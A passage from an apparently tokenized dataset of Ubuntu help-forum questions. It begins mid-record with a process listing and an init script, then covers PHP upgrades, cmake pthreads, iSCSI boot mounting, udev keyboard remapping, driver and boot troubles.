? 00:00:00 [ kworker/u4:4 ] root 133 2 0 21:56 ? 00:00:00 [ kworker/u4:5 ] root 134 2 0 21:56 ? 00:00:00 [ kworker/u4:6 ] root 135 2 0 21:56 ? 00:00:00 [ kworker/u4:7 ] root 137 2 0 21:56 ? 00:00:00 [ kworker/1:2 ] root 138 2 0 21:56 ? 00:00:00 [ kworker/u4:8 ] root 149 2 0 21:56 ? 00:00:00 [ jbd2/sda6-8 ] root 150 2 0 21:56 ? 00:00:00 [ ext4-rsv-conver ] root 291 1 1 21:56 ? 00:00:00 upstart-udev-bridge -- daemon root 295 1 0 21:56 ? 00:00:00 /lib/systemd/systemd-udevd -- daemon root 318 2 0 21:56 ? 00:00:00 [ kworker/u5:1 ] root 358 2 0 21:56 ? 00:00:00 [ hci0 ] root 359 2 0 21:56 ? 00:00:00 [ hci0 ] root 360 2 0 21:56 ? 00:00:00 [ kworker/u5:2 ] root 361 2 0 21:56 ? 00:00:00 [ cfg80211 ] root 368 2 0 21:56 ? 00:00:00 [ wl_event_handle ] root 375 2 0 21:56 ? 00:00:00 [ jbd2/sda4-8 ] root 376 2 0 21:56 ? 00:00:00 [ ext4-rsv-conver ] root 412 1 0 21:56 ? 00:00:00 /sbin/mount.ntfs /dev/sda2 /media/windows_os -o rw , umask=007 , gid=46 message+ 450 1 1 21:56 ? 00:00:00 dbus-daemon -- system -- fork root 566 2 0 21:56 ? 00:00:00 [ hd-audio0 ] root 590 1 0 21:56 ? 00:00:00 /lib/systemd/systemd-logind syslog 595 1 0 21:56 ? 00:00:00 rsyslogd root 613 1 0 21:56 ? 00:00:00 /usr/sbin/cupsd -f avahi 615 1 0 21:56 ? 00:00:00 avahi-daemon : running [ ubuntu-rv510.local ] avahi 616 615 0 21:56 ? 00:00:00 avahi-daemon : chroot helper colord 628 1 0 21:56 ? 00:00:00 /usr/lib/colord/colord root 730 1 0 21:56 ? 00:00:00 smbd -f root 738 730 0 21:56 ? 00:00:00 smbd -f root 833 1 0 21:56 ? 00:00:00 /usr/sbin/cups-browsed root 872 1 0 21:56 ? 00:00:00 upstart-socket-bridge -- daemon root 878 1 0 21:56 ? 00:00:00 upstart-file-bridge -- daemon root 947 1 0 21:56 tty4 00:00:00 /sbin/getty -8 38400 tty4 root 949 1 0 21:56 tty5 00:00:00 /sbin/getty -8 38400 tty5 root 955 1 0 21:56 tty2 00:00:00 /sbin/getty -8 38400 tty2 root 956 1 0 21:56 tty3 00:00:00 /sbin/getty -8 38400 tty3 root 959 1 0 21:56 tty6 00:00:00 /sbin/getty -8 38400 tty6 root 996 1 0 21:56 ? 00:00:00 cron daemon 997 1 0 21:56 ? 00:00:00 atd root 1027 1 0 21:56 ? 00:00:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket root 1033 1 0 21:56 ? 00:00:00 /usr/sbin/osspd -f -- dsp-slave=/usr/lib/osspd/ossp-slave root 1082 1 0 21:56 ? 00:00:00 lightdm root 1095 1082 4 21:56 tty7 00:00:01 /usr/bin/x -core :0 -seat seat0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch root 1098 1 0 21:56 ? 00:00:00 /usr/lib/accountsservice/accounts-daemon root 1103 1 0 21:56 ? 00:00:00 /usr/lib/policykit-1/polkitd -- no-debug root 1110 1 3 21:56 ? 00:00:00 /usr/bin/python -o /usr/share/wicd/daemon/wicd-daemon.py root 1157 1110 0 21:56 ? 00:00:00 /usr/bin/python -o /usr/share/wicd/daemon/monitor.py root 1172 1 0 21:56 ? 00:00:00 /bin/sh /etc/init.d/ondemand background root 1176 1172 0 21:56 ? 00:00:00 sleep 60 root 1180 1 0 21:56 tty1 00:00:00 /sbin/getty -8 38400 tty1 root 1200 2 0 21:56 ? 00:00:00 [ kauditd ] lightdm 1233 1 0 21:56 ? 00:00:00 init -- user -- startup-event indicator-services-start lightdm 1260 1233 0 21:56 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog lightdm 1268 1260 0 21:56 ? 00:00:00 /usr/lib/pulseaudio/pulse/gconf-helper root 1272 1082 0 21:56 ? 00:00:00 lightdm -- session-child 12 19 lightdm 1289 1233 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/indicator-sound/indicator-sound-service derek 1300 1 0 21:56 ? 00:00:00 /usr/bin/gnome-keyring-daemon -- daemonize -- login derek 1305 1272 0 21:56 ? 00:00:00 init -- user derek 1418 1305 0 21:56 ? 00:00:00 /bin/sh -e /proc/self/fd/9 derek 1419 1418 0 21:56 ? 00:00:00 sleep 60 derek 1420 1305 0 21:56 ? 00:00:00 ssh-agent -s derek 1425 1305 0 21:56 ? 00:00:00 dbus-daemon -- fork -- session -- address=unix : abstract=/tmp/dbus-tbuzsaa7hs derek 1431 1305 0 21:56 ? 00:00:00 upstart-event-bridge derek 1447 1305 0 21:56 ? 00:00:00 upstart-file-bridge -- daemon -- user derek 1449 1305 0 21:56 ? 00:00:00 upstart-dbus-bridge -- daemon -- system -- user -- bus-name system derek 1451 1305 0 21:56 ? 00:00:00 upstart-dbus-bridge -- daemon -- session -- user -- bus-name session derek 1514 1305 0 21:56 ? 00:00:00 /bin/sh /etc/xdg/xfce4/xinitrc -- /etc/x11/xinit/xserverrc derek 1525 1514 0 21:56 ? 00:00:00 xfce4-session derek 1528 1305 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd derek 1535 1525 1 21:56 ? 00:00:00 xfwm4 -- replace -- display :0.0 -- sm-client-id 28603cdd9-3a57-4d40-b799-3096ab8d5f12 derek 1543 1525 0 21:56 ? 00:00:00 thunar -- sm-client-id 2af7a492e-f4f0-4972-94fe-a1c2be3c4e1d -- daemon derek 1544 1525 1 21:56 ? 00:00:00 xfce4-panel -- display :0.0 -- sm-client-id 24606699f-cde0-4b73-8619-3333bf6dd7a0 derek 1551 1305 0 21:56 ? 00:00:00 xfsettingsd -- display :0.0 -- sm-client-id 249f3b9ec-0929-4458-aee4-5ff57823e73b derek 1552 1525 1 21:56 ? 00:00:00 xfdesktop -- display :0.0 -- sm-client-id 279839c86-3a31-4baf-b535-d8f5b4fbef30 root 1554 1 0 21:56 ? 00:00:00 /usr/lib/upower/upowerd derek 1575 1544 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libwhiskermenu.so 1 14680102 whiskermenu whisker menu show a menu to easily access installed applications derek 1579 1525 1 21:56 ? 00:00:00 xfce4-terminal -- geometry=192x44 -- display :0.0 -- role=xfce4-terminal-1405738282 -- 462796034 -- show-menubar -- show-borders -- hide-toolbar -- working-directory /home/derek -- sm-client-id 2b797f858-86b4-48f7-8fcc-9adf8ff62655 derek 1590 1305 0 21:56 ? 00:00:00 /usr/lib/gvfs/gvfsd derek 1604 1544 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/xfce4/panel-plugins/xfce4-eyes-plugin 12 14680104 eyes eyes eyes that spy on you derek 1608 1544 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/xfce4/panel-plugins/xfce4-timer 24 14680105 xfce4-timer xfce4 timer timer plugin for xfce panel derek 1613 1305 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/tumbler-1/tumblerd derek 1617 1544 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libweather.so 22 14680106 weather weather update show current weather conditions derek 1621 1305 0 21:56 ? 00:00:00 xfce4-power-manager -- restart -- sm-client-id 2f30580b6-4180-427f-b6ea-cce50d2a3d49 derek 1624 1544 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/xfce4/panel-plugins/xfce4-sensors-plugin 18 14680107 xfce4-sensors-plugin sensor plugin show sensor values . derek 1627 1305 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd derek 1629 1544 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/xfce4/panel-plugins/xfce4-netload-plugin 16 14680108 netload network monitor show network traffic derek 1630 1544 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystemload.so 19 14680109 systemload system load monitor monitor cpu load , swap usage and memory footprint derek 1631 1544 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libbattery.so 9 14680110 battery battery monitor show and monitor the battery status derek 1636 1544 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/xfce4/panel-plugins/xfce4-brightness-plugin 25 14680111 xfce4-brightness-plugin brightness plugin control your lcd brightness derek 1638 1544 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libindicator-plugin.so 15 14680112 indicator indicator plugin provides a panel area for unity indicators . indicators allow applications and system services to display their status and interact with the user . derek 1647 1544 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 4 14680113 systray notification area area where notification icons appear derek 1656 1305 0 21:56 ? 00:00:00 zeitgeist-datahub derek 1667 1544 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 8 14680114 actions action buttons log out , lock or other system actions derek 1674 1305 1 21:56 ? 00:00:00 /usr/bin/python -o /usr/share/wicd/gtk/wicd-client.py -- tray derek 1691 1305 1 21:56 ? 00:00:00 /usr/bin/python2 /usr/share/samsung-tools/session-service.py derek 1705 1305 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/indicator-application/indicator-application-service derek 1759 1305 0 21:56 ? 00:00:00 /usr/lib/at-spi2-core/at-spi-bus-launcher derek 1762 1305 0 21:56 ? 00:00:00 update-notifier derek 1765 1305 0 21:56 ? 00:00:00 /usr/lib/gvfs/gvfs-udisks2-volume-monitor derek 1767 1305 0 21:56 ? 00:00:00 /usr/bin/zeitgeist-daemon derek 1769 1759 0 21:56 ? 00:00:00 /bin/dbus-daemon -- config-file=/etc/at-spi2/accessibility.conf -- nofork -- print-address 3 root 1774 1 0 21:56 ? 00:00:00 /usr/lib/udisks2/udisksd -- no-debug derek 1787 1305 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/zeitgeist-fts derek 1790 1305 0 21:56 ? 00:00:00 /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1 derek 1794 1305 0 21:56 ? 00:00:00 /usr/lib/at-spi2-core/at-spi2-registryd -- use-gnome-session derek 1826 1787 0 21:56 ? 00:00:00 /bin/cat derek 1839 1305 0 21:56 ? 00:00:00 xfce4-volumed derek 1864 1305 0 21:56 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog derek 1868 1864 0 21:56 ? 00:00:00 /usr/lib/pulseaudio/pulse/gconf-helper derek 1871 1305 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/gconf/gconfd-2 derek 1893 1579 0 21:56 ? 00:00:00 gnome-pty-helper derek 1895 1305 0 21:56 ? 00:00:00 /usr/lib/gvfs/gvfsd-trash -- spawner :1.13 /org/gtk/gvfs/exec_spaw/0 derek 1896 1305 0 21:56 ? 00:00:00 init -- user -- startup-event indicator-services-start derek 1898 1579 0 21:56 pts/1 00:00:00 bash derek 1913 1896 0 21:56 ? 00:00:00 /usr/lib/x86_64-linux-gnu/indicator-sound/indicator-sound-service derek 2005 1579 0 21:56 pts/7 00:00:00 bash root 2037 1 0 21:56 ? 00:00:00 /usr/bin/python2 /usr/share/samsung-tools/system-service.py root 2052 2 0 21:56 ? 00:00:00 [ led_workqueue ] root 2068 2037 0 21:56 ? 00:00:00 [ wireless-on ] derek 2097 1305 0 21:56 ? 00:00:00 xbindkeys root 2313 1 0 21:56 ? 00:00:00 wpa_supplicant -b -i wlan0 -c /var/lib/wicd/configurations/f835dd64c3f6 -dwext root 2435 1 0 21:56 ? 00:00:00 /sbin/dhclient -v wlan0 root 2501 1 0 21:56 ? 00:00:00 /usr/sbin/winbindd -f root 2505 1 0 21:56 ? 00:00:00 nmbd -d root 2507 2501 0 21:56 ? 00:00:00 /usr/sbin/winbindd -f derek 2530 2005 0 21:57 pts/7 00:00:00 ps -ef file /etc/init.d/ondemand : # ! /bin/sh # # # begin init info # provides : ondemand # required-start : $ remote_fs $ all # required-stop : # default-start : 2 3 4 5 # default-stop : # short-description : set the cpu frequency scaling governor to `` ondemand '' # # # end init info # do n't run if we 're going to start an android lxc container : [ ! -f /etc/init/lxc-android-config.conf ] || exit 0 path=/sbin : /usr/sbin : /bin : /usr/bin . /lib/init/vars.sh . /lib/lsb/init-functions available= '' /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_governors '' case `` $ 1 '' in start ) start-stop-daemon -- start -- background -- exec /etc/init.d/ondemand -- background ; ; background ) sleep 60 # probably enough time for desktop login [ -f $ available ] || exit 0 read governors $ cpufreq done ; ; restart|reload|force-reload ) echo `` error : argument ' $ 1 ' not supported '' > & 2 exit 3 ; ; stop ) ; ; * ) echo `` usage : $ 0 start|stop '' > & 2 exit 3 ; ; esac
499232	unexpected php version 5.5.15rc1 from ppa : ondrej/php5	i 've just upgraded from ondrej 's oldstable 5.4 to 5.5 package on 12.04 - which was smooth . the version installed is 5.5.15rc - i was n't expecting the rc bit . will an upgrade regularly include rc versions and is there a way to stick to the official releases - currently at 5.5.14 - without hand-picking upgrades ?
499236	ca n't download steam on ubuntu 12.04	i am running ubuntu 12.04 and when i try to download steam , the ubuntu software center pops up and i receive this message . ca n't download steam on ubuntu `` dependency is not sastifactible : curl '' how do i resolve this issue ?
499238	cmake ca n't find pthread	pthreads works on the system : $ gcc -o what what.c /tmp/cci6m52b.o : in function `main ' : what.c : ( .text+0x37 ) : undefined reference to `pthread_create' what.c : ( .text+0x48 ) : undefined reference to `pthread_join' collect2 : error : ld returned 1 exit status $ gcc -pthread -o what what.c $ ./what in the thread . however , when i run cmake with the following bare-bones cmakelists.txt : cmake_minimum_required ( version 2.8.6 ) find_package ( threads ) the output is : -- could not find threads ( missing : threads_found ) what gives ? error log states : /usr/bin/cc -std=c11 -d_gnu_source -wall -wextra -wpointer-arith -wundef -wvla -wwrite-strings -werror -wno-error=extra -wno-error=deprecated-declarations -wno-error=sign-compare -wno-error=strict-aliasing -wno-error=type-limits -wno-unused-parameter -wno-error=unused-variable -wno-error=undef -wno-error=uninitialized -wlogical-op -wno-error=maybe-uninitialized -waggregate-return -wnested-externs -wold-style-definition -wstrict-prototypes -march=native -o cmakefiles/cmtrycompileexec2533162744.dir/checkincludefiles.c.o -c /mnt/shared/fooproj/build/release/cmakefiles/cmaketmp/checkincludefiles.c /mnt/shared/fooproj/build/release/cmakefiles/cmaketmp/checkincludefiles.c:5:5 : error : function declaration isn’t a prototype [ -werror=strict-prototypes ] int main ( ) { return 0 ; } ^ /mnt/shared/fooproj/build/release/cmakefiles/cmaketmp/checkincludefiles.c : in function ‘main’ : /mnt/shared/fooproj/build/release/cmakefiles/cmaketmp/checkincludefiles.c:5:5 : error : old-style function definition [ -werror=old-style-definition ] cc1 : all warnings being treated as errors [ ... ] source : /* */ # include < pthread.h > int main ( ) { return 0 ; }
499239	problem installing and problem remove partition	i have two problems , one is that ubuntu not will boot unless it is from a usb drive . how do i make it boot up from my ssd ? i realized i had a partition on my ssd which i probably need to remove . i have tried to unmount it and delete the partition but when i apply the changes i get this error message back partition ( s ) 2 on /dev/sda have been written , but we have been unable to inform the kernel of the change , probably because it/they are in use . as a result , the old partition ( s ) will remain in use . you should reboot now before making further changes .
499245	ubuntu 14.04 drivers ati radeon hd4350	i have a problem with drivers for ati radeon hd 4350 , namely to have a default maximum resolution of 1024x768 and small problems with the games . it is a good driver who , after instaalcji as those of the manufacturer of amd that when you reboot after installing the causes black screen and you need to restore the system .
499246	iscsi auto startup at boot 14.04	i 'm running trusty tahr ( 14.04 ) server . i 've attached an iscsi disk and mounted it , mkfs , etc . works great , if i do it manually . i 'd much prefer to have my box mount the disk at boot so i 've modified /etc/iscsi/iscsid.conf by removing the comment hash node.startup = automatic and commenting out node.startup = manual ( note : this is n't the default , but i 've tried it both ways and i 'm sticking with the automatic as that makes sense ) node.startup = automatic # # node.startup = manual fstab looks good . i 've git my block id set , _netdev is set , and as i stated earlier , manually , everything works . if i mount the disk , the fstab config leads the mount correctly . in general use , things look good . ( in fact , it 's a time machine backup ) . my only issue is , why is n't this working at boot ? boot.log shows this info : * starting iscsi initiatior service iscsid [ ok ] iscsiadm : no records found * setting up iscsi targets * stop clearly , an error is evident , but where ? aside from having to issue : sudo iscsiadm -m node -- login i do n't have to intervene . just ... . need ... that ... last ... piece . thanks
499247	how to completely start from scratch with ubuntu ?	i have an asus notebook and it comes from factory with ubuntu . i like ubuntu and i do not want to change the os . however , this notebook does not have a disc drive . it does have usb , but i do not know how to boot from usb . i 'd like to wipe the computer entirely .
499248	computer boots to command line	i have a lenovo g575 laptop which had its hard drive replaced with an ssd , and ubuntu 12.04 installed . it has worked for a year without any noticible problems . all of a sudden the laptop boots to the commmand line . if i use the startx command , it goes to a different user interface that i use when the computer starts normally . i am looking for suggestions on how to troubleshoot this problem . ssd , motherboard , installation errors ? any suggestions would be appreciated . thank you , mg92865
499249	i need help starting my computer	i followed a youtube video that told me how to uninstall ubuntu after restarting the computer i received this message error : file not found . grub rescue > i have heard that you can reboot using a live cd , but mine is in a buddy 's house and i have also heard that if you type 1s it will do something . i have tried this and all i receive is : unknown command '1s '
499250	problem with pae on dell inspiron 9200	i just downloaded ubuntu 14.04 ( 32 bit ) and put it on a usb stick . when i boot up the laptop trying to install it i get : '' error : pae is disabled on this pentium m ( pae can potentially be enabled with kernel parameter `` forcepae '' - this is unsupported , may cause unknown problems , and will taint the kernel ) this kernel requires the following features not present on the cpu : pae unable to boot - please use a kernel appropriate for your cpu '' the laptop is a dell inspiron 9200 . i suspect that i will probably have to use an earlier version of ubuntu . how can i tell what would work or is there another option ?
499251	host-based mirroring on ubuntu	does ubuntu have any native host-based mirroring ? i need this for migrating data between storage arrays .
499252	my custom udev hwdb rule does n't work	i 'm using ubuntu 14.04 installed in efi mode , i tried to write simple udev rule which for all external usb keyboards will map capslock for escape . i use a lot of vim and plug and unplug keyboards often so this will simplify things a lot . so following different tutorials i 've made such file cat /etc/udev/hwdb.d/61-keyboard-local.hwdb keyboard : usb : v*p* keyboard : usb : v046dpc30e* keyboard_key_58=esc then i executed udevadm hwdb -- update but it does n't work . i 've used doubled mapping first general rule for any usb keyboard keyboard : usb : v*p* and for the one that i had already plugged keyboard : usb : v046dpc30e* thought maybe specific work will work but unfortunatelly not . so i tried to debug what is wrong and following other tutorial run this : udevadm -- debug test /devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.0/0003:046d : c30e.0007/input/input20 calling : test version 204 this program is for debugging only , it does not run any program specified by a run key . it may show incorrect results , because some values may be different , or not available at a simulation run . === trie on-disk === tool version : 204 file size : 5740456 bytes header size 80 bytes strings 1262416 bytes nodes 4477960 bytes load module index read rules file : /lib/udev/rules.d/40-crda.rules read rules file : /lib/udev/rules.d/40-gnupg.rules read rules file : /lib/udev/rules.d/40-gnupg2.rules read rules file : /lib/udev/rules.d/40-hyperv-hotadd.rules read rules file : /lib/udev/rules.d/40-inputattach.rules read rules file : /lib/udev/rules.d/40-libgphoto2-6.rules goto 'libgphoto2_usb_end ' has no matching label in : '/lib/udev/rules.d/40-libgphoto2-6.rules' read rules file : /lib/udev/rules.d/40-libsane.rules read rules file : /lib/udev/rules.d/40-usb-media-players.rules read rules file : /lib/udev/rules.d/40-usb_modeswitch.rules read rules file : /lib/udev/rules.d/42-usb-hid-pm.rules read rules file : /lib/udev/rules.d/50-firmware.rules read rules file : /lib/udev/rules.d/50-udev-default.rules read rules file : /lib/udev/rules.d/55-dm.rules read rules file : /lib/udev/rules.d/56-hpmud.rules read rules file : /lib/udev/rules.d/60-cdrom_id.rules read rules file : /lib/udev/rules.d/60-keyboard.rules read rules file : /lib/udev/rules.d/60-pcmcia.rules read rules file : /lib/udev/rules.d/60-persistent-alsa.rules read rules file : /lib/udev/rules.d/60-persistent-input.rules read rules file : /lib/udev/rules.d/60-persistent-serial.rules read rules file : /lib/udev/rules.d/60-persistent-storage-dm.rules read rules file : /lib/udev/rules.d/60-persistent-storage-tape.rules read rules file : /lib/udev/rules.d/60-persistent-storage.rules read rules file : /lib/udev/rules.d/60-persistent-v4l.rules read rules file : /lib/udev/rules.d/61-accelerometer.rules read rules file : /lib/udev/rules.d/64-btrfs.rules read rules file : /lib/udev/rules.d/64-xorg-xkb.rules read rules file : /lib/udev/rules.d/66-xorg-synaptics-quirks.rules read rules file : /lib/udev/rules.d/69-cd-sensors.rules import found builtin 'usb_id -- export % p ' , replacing /lib/udev/rules.d/69-cd-sensors.rules:89 read rules file : /lib/udev/rules.d/69-libmtp.rules read rules file : /lib/udev/rules.d/69-xorg-vmmouse.rules read rules file : /lib/udev/rules.d/69-xserver-xorg-input-wacom.rules read rules file : /etc/udev/rules.d/70-persistent-net.rules read rules file : /lib/udev/rules.d/70-power-switch.rules read rules file : /lib/udev/rules.d/70-printers.rules read rules file : /lib/udev/rules.d/70-uaccess.rules read rules file : /lib/udev/rules.d/71-seat.rules read rules file : /lib/udev/rules.d/73-idrac.rules read rules file : /lib/udev/rules.d/73-seat-late.rules read rules file : /lib/udev/rules.d/75-net-description.rules read rules file : /lib/udev/rules.d/75-persistent-net-generator.rules read rules file : /lib/udev/rules.d/75-probe_mtd.rules read rules file : /lib/udev/rules.d/75-tty-description.rules read rules file : /lib/udev/rules.d/77-mm-ericsson-mbm.rules read rules file : /lib/udev/rules.d/77-mm-huawei-net-port-types.rules read rules file : /lib/udev/rules.d/77-mm-longcheer-port-types.rules read rules file : /lib/udev/rules.d/77-mm-nokia-port-types.rules read rules file : /lib/udev/rules.d/77-mm-pcmcia-device-blacklist.rules read rules file : /lib/udev/rules.d/77-mm-platform-serial-whitelist.rules read rules file : /lib/udev/rules.d/77-mm-qdl-device-blacklist.rules read rules file : /lib/udev/rules.d/77-mm-simtech-port-types.rules read rules file : /lib/udev/rules.d/77-mm-usb-device-blacklist.rules read rules file : /lib/udev/rules.d/77-mm-usb-serial-adapters-greylist.rules read rules file : /lib/udev/rules.d/77-mm-x22x-port-types.rules read rules file : /lib/udev/rules.d/77-mm-zte-port-types.rules read rules file : /lib/udev/rules.d/77-nm-olpc-mesh.rules read rules file : /lib/udev/rules.d/78-graphics-card.rules read rules file : /lib/udev/rules.d/78-sound-card.rules read rules file : /lib/udev/rules.d/80-drivers.rules read rules file : /lib/udev/rules.d/80-mm-candidate.rules read rules file : /lib/udev/rules.d/80-udisks2.rules read rules file : /lib/udev/rules.d/85-brltty.rules read rules file : /lib/udev/rules.d/85-hdparm.rules read rules file : /lib/udev/rules.d/85-hplj10xx.rules read rules file : /lib/udev/rules.d/85-keyboard-configuration.rules read rules file : /lib/udev/rules.d/85-regulatory.rules read rules file : /lib/udev/rules.d/85-usbmuxd.rules read rules file : /lib/udev/rules.d/90-alsa-restore.rules read rules file : /lib/udev/rules.d/90-alsa-ucm.rules read rules file : /lib/udev/rules.d/90-libgpod.rules read rules file : /lib/udev/rules.d/90-pulseaudio.rules read rules file : /lib/udev/rules.d/95-cd-devices.rules read rules file : /lib/udev/rules.d/95-udev-late.rules read rules file : /lib/udev/rules.d/95-upower-battery-recall-dell.rules read rules file : /lib/udev/rules.d/95-upower-battery-recall-fujitsu.rules read rules file : /lib/udev/rules.d/95-upower-battery-recall-gateway.rules read rules file : /lib/udev/rules.d/95-upower-battery-recall-ibm.rules read rules file : /lib/udev/rules.d/95-upower-battery-recall-lenovo.rules read rules file : /lib/udev/rules.d/95-upower-battery-recall-toshiba.rules read rules file : /lib/udev/rules.d/95-upower-csr.rules read rules file : /lib/udev/rules.d/95-upower-hid.rules read rules file : /lib/udev/rules.d/95-upower-wup.rules read rules file : /lib/udev/rules.d/97-bluetooth-hid2hci.rules rules contain 196608 bytes tokens ( 16384 * 12 bytes ) , 33727 bytes strings 18818 strings ( 164973 bytes ) , 15727 de-duplicated ( 134338 bytes ) , 3092 trie nodes used device 0x15f81b0 has devpath '/devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.0/0003:046d : c30e.0007/input/input20' device 0x1600050 filled with db file data device 0x15ff420 has devpath '/devices/virtual/dmi/id' value ' [ dmi/id ] sys_vendor ' is 'hewlett-packard' import builtin 'usb_id ' /lib/udev/rules.d/40-libgphoto2-6.rules:3 device 0x15ff420 has devpath '/devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.0/0003:046d : c30e.0007' device 0x1605e30 has devpath '/devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.0' /sys/devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.0 : if_class 3 protocol 0 device 0x1607b80 has devpath '/devices/pci0000:00/0000:00:14.0/usb3/3-2' device 0x1608170 has devpath '/devices/pci0000:00/0000:00:14.0/usb3' device 0x1608550 has devpath '/devices/pci0000:00/0000:00:14.0' device 0x1608930 has devpath '/devices/pci0000:00' import builtin 'input_id ' /lib/udev/rules.d/50-udev-default.rules:10 capabilities/ev raw kernel attribute : 120013 capabilities/abs raw kernel attribute : 0 capabilities/rel raw kernel attribute : 0 capabilities/key raw kernel attribute : 1000000000007 ff800000000007ff febeffdff3cfffff fffffffffffffffe test_key : checking bit block 0 for any keys ; found=1 test_key : checking bit block 64 for any keys ; found=1 test_key : checking bit block 128 for any keys ; found=1 test_key : checking bit block 192 for any keys ; found=1 import builtin 'hwdb ' /lib/udev/rules.d/50-udev-default.rules:11 import builtin 'hwdb ' returned non-zero import builtin 'path_id ' /lib/udev/rules.d/60-persistent-input.rules:31 device 0x15ff420 filled with db file data run 'kmod load $ env { modalias } ' /lib/udev/rules.d/80-drivers.rules:5 unable to create temporary db file '/run/udev/data/+input : input20.tmp ' : permission denied .input_class=kbd action=add devpath=/devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.0/0003:046d : c30e.0007/input/input20 ev=120013 id_bus=usb id_for_seat=input-pci-0000_00_14_0-usb-0_2_1_0 id_input=1 id_input_key=1 id_input_keyboard=1 id_model=hid_compliant_keyboard id_model_enc=hid\x20compliant\x20keyboard id_model_id=c30e id_path=pci-0000:00:14.0-usb-0:2:1.0 id_path_tag=pci-0000_00_14_0-usb-0_2_1_0 id_revision=0180 id_serial=logitech_hid_compliant_keyboard id_type=hid id_usb_driver=usbhid id_usb_interfaces=:030101:030000 : id_usb_interface_num=00 id_vendor=logitech id_vendor_enc=logitech id_vendor_id=046d key=1000000000007 ff800000000007ff febeffdff3cfffff fffffffffffffffe led=7 modalias=input : b0003v046dpc30ee0110-e0,1,4,11,14 , k71,72,73,74,75,77,79,7a,7b,7c,7d,7e,7f,80,81,82,83,84,85,86,87,88,89,8a , b7 , b8 , b9 , ba , bb , bc , bd , be , bf , c0 , c1 , c2 , f0 , ram4 , l0,1,2 , sfw msc=10 name= '' logitech hid compliant keyboard '' phys= '' usb-0000:00:14.0-2/input0 '' product=3/46d/c30e/110 prop=0 subsystem=input tags= : seat : udev_log=7 uniq= '' '' usec_initialized=3550400 run : 'kmod load input : b0003v046dpc30ee0110-e0,1,4,11,14 , k71,72,73,74,75,77,79,7a,7b,7c,7d,7e,7f,80,81,82,83,84,85,86,87,88,89,8a , b7 , b8 , b9 , ba , bb , bc , bd , be , bf , c0 , c1 , c2 , f0 , ram4 , l0,1,2 , sfw' unload module index any idea how can i debug it and make it work ?
499254	how to change date and time format from arabic to english	hi i am using kubuntu and my language system is english but when i am using date command the output result is arabic format like this جمعه ۱۸ ژوئیه ۱۴، ساعت ۰۲ : ۳۴ : ۵۸ ( irdt ) what should i do to change this ? ? ?
499255	squid-deb-proxy 503 service unavailable	i have installed squid-deb-proxy in order to create a cache of packages . the command sudo apt-get update produces errors such as err http : //mirror.dhakacom.com trusty/universe amd64 packages 503 service unavailable and w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/trusty-security/main/source/sources 503 service unavailable here are the contents of my 02proxy file : $ cat /etc/apt/apt.conf.d/02proxy acquire { http { proxy `` http : //localhost:8000 '' ; } ; } ; however , with squid-deb-proxy removed , i face no error . what do i need to do in order to set up squid-deb-proxy ?
499256	problem with tp-link wn822n and ubuntu 14.04	ubuntu shows that there is a wireless connection , and firefox connects to my home page , then the browser is unable to make any more connections . the network connection window goes from 72 to 7 mbs ( ? ) , and the browser freezes . this also occurs with chrome . i have tried to find out how to install a realtek driver for linux , the instructions are very confusing . any help would be appreciated ! newby-peter
499257	imgburn i/o error when trying to start program	so i 'm trying to burn xubuntu to a live cd and run off of that . the problem is though that when i even try to start the program the menu comes up but none of the options are available . i ca n't even go to tools > settings to change any of the settings . here is the error i get : i/o error ! device [ 0:0:0 ] slimtype dvd a ds8a9sh eaa2 ( e : ) ( sata ) cbd 12 00 00 00 60 00 interpretation inquiry reason : the request could not be performed because of an i/o device error . it then gives me two options : retry or cancel . it never works when i try to retry . any help is much appreciated !
